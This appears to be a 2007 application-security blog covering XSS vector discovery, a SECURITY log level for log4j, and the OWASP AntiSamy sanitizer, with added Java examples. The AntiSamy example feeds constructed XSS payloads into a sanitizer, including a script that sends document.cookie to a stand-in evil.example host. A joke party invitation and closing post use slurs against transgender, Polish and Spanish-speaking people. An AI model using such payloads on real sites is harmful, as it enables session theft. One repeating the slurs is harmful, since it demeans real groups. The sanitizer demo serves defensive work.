because arshan's too cheap to license OneNote

So I took the opportunity during the OWASP San Jose conference to throw some of the ideas I’ve had bouncing around in my head at people. One of the things I was talking about was how strangely inefficient I thought the current XSS attack vector discovery paradigm was. What led me to this revelation was the realization that there was a paradigm at all. Small group of industry thought leaders + army of XSS fan boys/glory seekers + incomplete auditing style = fail. I’m not sure if that equation I just made up is mathematically sound, but it has one more reference to lolcats than other equations, and that’s in honor of the proud new dad on the block, Mr. Andrew van der Stock.

Every time we recognize another location where JavaScript can occur, or discover another encoding or fragmenting attack that, for some god awful reason or another, works in a major browser, we e-mail RSnake and he puts it in his cheat sheet, or we submit it to gnucitizen’s xssDB project. We’re doing the whole thing backwards, at least for open source browsers (Firefox, Konqueror – oh god, has anyone checked Lynx?) or open source browser engines (Safari’s WebKit). We can’t get a peek into the source code for some browsers (Opera, IE), but they should follow the same advice.

Start with the code.

Right now, we’re treating XSS attack vector discovery like it’s a blackbox penetration test. Open up the source and let’s work this thing from the other side! As someone with a good bit of experience not sucking ass at writing or reviewing code, I can tell you that we can provide a lot higher assurance if we review the code of the browsers in an organized way, rather than the current methods of discovery, which I will sum up here:

  • mistype an already known XSS vector and accidentally discover a new one
  • encode an existing XSS vector in a new way
  • use some kind of crazy insight/gut feeling to test a theory you pulled from the clear blue sky

Relying on these 3 techniques has gotten us this far – but do we really want to rely on these forever? Bonus follow up question: do you think all the XSS attacks have been discovered? If so, they’re always looking for new employees at the US Patent Office.

Man, I can see the flames now. Well, Mr. Smartypants, if it’s so easy, why don’t you do it? Reviewing a large application or an engine is not a job for one person. Incidentally, it’s also not a job for one team. With the number of professional code reviewers out there, this could very easily be a community project (OWASP Spring of Code 2008, maybe?). A lot of eggs are in the browsers’ basket – and this is a way that we could help. I, for one, will be looking at some browser code in my spare time and I’d encourage everyone else to do the same. Like my boss Dave Wichers said, there are 5 billion web users, hundreds of thousands of companies writing web applications, and 6 browsers. Obviously, the most bang for your security buck will be with browser changes. That’s not to say the browsers can fix everything, because they can’t – but there’s no excuse for not fixing something that can be fixed there.

So, I gave this pitch to Jeff Williams and RSnake (do I really have to call you that?), and they both liked the idea. RSnake’s answer was funny, though. He said that he had indeed tried to do this a while back and that was how he discovered one 0-day vector. Unfortunately, though, he found the code to be such spaghetti that he couldn’t really make heads or tails of it. My response was, “Well, you should be able to look at the JavaScript engine and see where it gets invoked from”, to which he replied, “You’d think.” However, by his own admission, RSnake is the worst programmer in the world. So, grain of salt there.

One of the things I always bitch about when teaching web application security is the fact that log4j (and all its ports to other languages) doesn’t have a “security” log level. How can you have a plan for security auditing if your log messages are spread out across all the different log levels and buried among all the noise generated by your application? The log files are already more incoherent than WWF trash talk, but at least with a “security” log level we can “filter” our security messages to facilitate some useful incident response.

So during my most recent class at the OWASP conference my new friend Roman Hustad burned half a calorie typing “creating a new log level in log4j” into Google and figured out how I could create a solution to all my whining. It was one of those moments where I realized that I had been bitching for so long that I forgot to ever try to fix the problem myself. So, to make it up to all the students who had to put up with my bitching, here you go. Here’s how you add a SECURITY log level to log4j complete with documentation and test cases.
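Here is what that looks like in code, as an added example written for this page (it is not the class the post links to). It is a custom `Level` subclass for log4j 1.2 that slots SECURITY between WARN and ERROR, the static `toLevel` methods that log4j’s `LEVEL#classname` property syntax resolves through reflection, and a small demo that logs a failed login at SECURITY with the source address, the one field IR will want later. The package name, the logger name and the sample login event are all constructed for the example.

```java
package com.example.logging;   // assumed package, used again in the properties snippet below

import org.apache.log4j.ConsoleAppender;
import org.apache.log4j.Level;
import org.apache.log4j.Logger;
import org.apache.log4j.PatternLayout;

/**
 * SECURITY log level for log4j 1.2. Numerically it sits between WARN (30000)
 * and ERROR (40000), so a logger whose threshold is WARN still emits it, and
 * a LevelMatchFilter can peel SECURITY events off into their own file:
 *
 *   log4j.appender.SEC=org.apache.log4j.FileAppender
 *   log4j.appender.SEC.File=security.log
 *   log4j.appender.SEC.layout=org.apache.log4j.PatternLayout
 *   log4j.appender.SEC.filter.1=org.apache.log4j.varia.LevelMatchFilter
 *   log4j.appender.SEC.filter.1.LevelToMatch=SECURITY#com.example.logging.SecurityLevel
 *   log4j.appender.SEC.filter.1.AcceptOnMatch=true
 *   log4j.appender.SEC.filter.2=org.apache.log4j.varia.DenyAllFilter
 *
 * The "SECURITY#classname" form is how log4j finds a custom level: it calls
 * the class's static toLevel(String, Level) reflectively, so that method must exist.
 */
public class SecurityLevel extends Level {

    public static final int SECURITY_INT = Level.WARN_INT + 5000;

    // syslog equivalent 4 == "warning", the same mapping log4j uses for WARN.
    public static final Level SECURITY = new SecurityLevel(SECURITY_INT, "SECURITY", 4);

    protected SecurityLevel(int level, String levelStr, int syslogEquivalent) {
        super(level, levelStr, syslogEquivalent);
    }

    public static Level toLevel(String name) {
        return toLevel(name, Level.DEBUG);
    }

    public static Level toLevel(String name, Level defaultLevel) {
        if (name != null && "SECURITY".equalsIgnoreCase(name.trim())) {
            return SECURITY;
        }
        return Level.toLevel(name, defaultLevel);
    }

    public static Level toLevel(int val) {
        return toLevel(val, Level.DEBUG);
    }

    public static Level toLevel(int val, Level defaultLevel) {
        return val == SECURITY_INT ? SECURITY : Level.toLevel(val, defaultLevel);
    }

    /** Convenience wrapper so call sites read like logger.warn(...). */
    public static void security(Logger logger, Object message) {
        logger.log(SECURITY, message);
    }

    public static void main(String[] args) {
        Logger root = Logger.getRootLogger();
        root.addAppender(new ConsoleAppender(new PatternLayout("%d{ISO8601} %-8p %c - %m%n")));
        root.setLevel(Level.INFO);

        Logger log = Logger.getLogger("com.example.auth");   // assumed logger name

        // Constructed sample event. The socket peer address is the one you can
        // trust; X-Forwarded-For is only meaningful if your own reverse proxy set it.
        String user = "jsmith";
        String remoteAddr = "203.0.113.7";      // TEST-NET-3, constructed
        String forwardedFor = "198.51.100.23";  // constructed

        log.info("profile page rendered in 12ms");   // ordinary application noise
        security(log, "login failed user=" + user + " src=" + remoteAddr + " xff=" + forwardedFor);
    }
}
```

Because SECURITY is above WARN, nothing in an existing configuration changes except that the new events now carry their own label; the filter pair in the class comment is what turns that label into a separate `security.log` you can hand to whoever is doing incident response.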

While we’re on the subject of logging/IR, I was talking to some people at the conference about the use of Tor to anonymize all layer 7 attacks. There’s a lot of people parroting the idea that the source IP is useless because it can be spoofed. If I’m doing IR, spoofing is the last thing I’m thinking about. Spoofing an IP is fairly difficult for what’s usually not a whole lot of gain: a layer 7 attack rides on a TCP connection, and a spoofer never sees the server’s responses, so it buys an HTTP attacker almost nothing. Let’s take a step back and think about the different ways an attacker could hide the source of their attack:

  • By bouncing traffic off a public/misconfigured HTTP proxy
  • Launching the attack without hiding its source, at the tail end of a chain of compromised hosts (think that’s hard? go scan a 3rd world country for PHF vulnerabilities, circa 1996)
  • An anonymizing system like Tor or the old Freedom NET
  • IP spoofing

Which of these do you think an attacker with half a brain is going to do? Anyway, I got the feeling some people took away the idea that it was useless to log the source IP, which wasn’t my intention at all. That’d be like the Attorney General telling the police commissioners – “Listen, people can wear gloves when they stab/shoot/rape/donkey punch each other, so there’s no use in collecting fingerprints.” Not at all. That’s right, I just likened myself to the Attorney General. So, in conclusion, an attacker who has more than half a brain and the ability to use Google is going to make himself untraceable, but routine police work solves a lot of crimes.

December 21st, 2007. Everyone is invited. Here’s a copy of my Evite.

To whom it should definitely concern,

I am Chuck Norris. You may know me as the guy who can divide by zero, or the guy who can believe it’s not butter, or the guy who can touch MC Hammer. These are all known facts about me [1]. It has come to my attention that an inadequate amount of praise has been heaped upon my karate instructor and personal trainer, a man named Arshan Dabirsiaghi. To indicate his importance I have set up an annual party coinciding with the birth of your savior, Jesus Christ, in order to allow you a single night to pay homage to him.

If it were my party you were ditching I would simply have sex with your planet until it blew up in pure geological ecstasy, but he shows a compassion for you that I would not have for my own son, were he not able to donkey punch a nun to death by the age of 3 roundhouse kicks[2][3].

I offer you this one opportunity to redeem your race. Come, pay homage and deliver praise like you don’t want to be speared by my fist like a deliciously seasoned lamb kabob with onions and peppers. If you doubt my power, just realize that in late 1997 I farted and 6 months later El Nino had killed forty thousand people. Fulfill your obligation or I will cancel your race like Battlestar Galactica with a single roundhouse kick to the core of the Earth. I am a fair person. When I want to fight, I always go against the odds. A single ninja can kill a whole town of peasants so I try to only fight whole towns of ninjas just after snacking on AIDS cookies. If a single ninja survives my initial roundhouse kick I headbutt him underneath the universe where he gets stuck for about 5 minutes before he eventually dies of massive regret for not using the Total Gym.

In this spirit of fairness I am arranging non-lethal accommodations for this party which should be favorable to a majority of humans based on my experience spent as a Ranger in Texas:

– Food provided by Panda Express
– Two kegs (Miller Lite and Something Darker)
– Beer pong
– Flip cup
– Classic, insulting decor
– Post-op transgender turbosluts

Also, no Polish.

Chuck Norris
Principal Roundhouse Kick Engineer
Scranton, PA

P.S. Dad, stop acting like I’m a steamboat operator.

2. Roundhouse kicks are the only unit of measurement of any kind.

I’m releasing the OWASP AntiSamy project today. I have a host of early adopters from big name companies who are looking to integrate the solution, including Sun, eBay and more. While it’s really exciting that I’m getting some instant traction, I know there is a lot of work ahead. The framework is in place and the theoretical solution is now out there, but we need implementations in .NET and PHP as soon as humanly possible.

To download the code, the binaries, JavaDocs and all the normal distribution stuff, please visit the project page on Google Code. To test a live AntiSamy demo, visit my test page where you can attack a number of different policy files. There’s also a paper I wrote (PDF) which explains the design choices I made when building AntiSamy. It doubles as an academic overview of the framework. Finally, there are the slides I presented at the OWASP & WASC Fall 2007 conference in San Jose. More on that in a future post.

Wider usage means more people looking at the problem and establishing more useful policy files. If you are interested in helping out, please let me know. I talked to a couple people at the conference from Zend and a few people from the Rails community that were interested, so I’m counting on those people to drop me a line. I plan on writing the .NET version since that’s a language that I know with at least a passing familiarity.

Like I wrote on RSnake’s site, I’m not just looking for ways to bypass the security filter. If you can find one, that’s great (sort of). I’m also looking for usability requests or suggestions. Throughout the development of AntiSamy I tried to imagine myself as the developer at MySpace faced with the Herculean task of only allowing non-malicious HTML/CSS. I figure if that guy can utilize the API in a usable way, then anyone can. Unfortunately, that guy probably killed himself a long time ago.
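For anyone wondering what “utilize the API” amounts to for that MySpace developer, here is an added example written for this page (not code from the post or from the AntiSamy distribution). It wraps the AntiSamy 1.x Java API as I know it, `Policy.getInstance`, `AntiSamy.scan` and `CleanResults`, around a profile-editing use case, and feeds it a constructed chunk of hostile HTML/CSS. The policy file name and the `ProfileSanitizer` class are assumptions; the classes and methods under `org.owasp.validator.html` are the ones I believe the 1.x release ships, so check them against the JavaDocs on the project page if your version differs.

```java
import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;

/**
 * Sanitizes user-supplied profile HTML with AntiSamy. The policy file is the
 * whitelist; everything the policy does not explicitly allow is dropped.
 * Hypothetical wrapper class, constructed for this example.
 */
public class ProfileSanitizer {

    private final AntiSamy antiSamy = new AntiSamy();
    private final Policy policy;

    /** @param policyFile path to a policy XML, e.g. the MySpace-style one shipped with AntiSamy (assumed name). */
    public ProfileSanitizer(String policyFile) throws PolicyException {
        this.policy = Policy.getInstance(policyFile);
    }

    /**
     * Returns HTML that conforms to the policy. The error messages describe
     * what was stripped; they are worth logging, since a user who keeps
     * submitting <script> tags is telling you something.
     */
    public String clean(String untrustedHtml) throws ScanException, PolicyException {
        CleanResults results = antiSamy.scan(untrustedHtml, policy);
        for (Object msg : results.getErrorMessages()) {   // raw List in 1.x, List<String> later
            System.err.println("antisamy: " + msg);
        }
        return results.getCleanHTML();
    }

    public static void main(String[] args) throws Exception {
        ProfileSanitizer sanitizer = new ProfileSanitizer("antisamy-myspace.xml"); // assumed file name

        // Constructed hostile input: benign markup mixed with a script tag,
        // a javascript: URL and a CSS expression, the usual profile-page payloads.
        String dirty = "<div style=\"color: red; width: expression(alert(1))\">hi <b>there</b>"
                + "<script>document.location='http://evil.example/?'+document.cookie</script>"
                + "<a href=\"javascript:alert(document.cookie)\">click me</a></div>";

        System.out.println(sanitizer.clean(dirty));
    }
}
```

The important design point for the integrating developer is that the policy, not the code, decides what survives: the same `clean` call behaves like a Slashdot-style comment filter or a MySpace-style profile editor depending only on which policy file you load, which is why better policy files are the thing wider usage should produce.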

I was basically afraid that no one would invite me to the cool parties unless I got a blog. So, here’s my blog. Once this whole Internet fad is over, those people at the parties are going to be embarrassed. Did you know the word “embarrassed” is roughly equivalent to the word “pregnant” in Spanish?

You should be embarrassed, you dirty Spanish slut.